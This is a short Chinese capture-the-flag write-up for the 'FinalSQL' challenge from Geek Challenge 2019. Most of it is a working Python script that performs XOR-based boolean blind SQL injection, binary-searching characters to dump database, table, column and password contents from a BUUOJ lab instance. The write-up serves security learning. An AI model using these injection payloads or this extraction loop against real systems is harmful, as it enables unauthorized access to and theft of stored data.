[极客大挑战 2019]FinalSQL

一道布尔盲注。主要要记住多fuzz
想布尔这种，要多看回显。确定了是布尔盲注就简单多了，这题就是fuzz出来了^然后可以用异或注入

点击查看代码

import requests
import time

url="http://c4e97744-291f-4ace-b150-02a27c477086.node4.buuoj.cn:81/search.php?"
temp={"id":""}
flag= ""

for i in range(1,1000):

    time.sleep(0.06)

    low=32
    high=128
    mid=(low+high)//2
    while(low<high):
        #库名
        #temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
        # 表名
        #temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)^1" %(i,mid)
        # 字段名
        #temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # 内容
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 127):
        break
    flag += chr(mid)
    print(flag)

print("终于等到你", flag)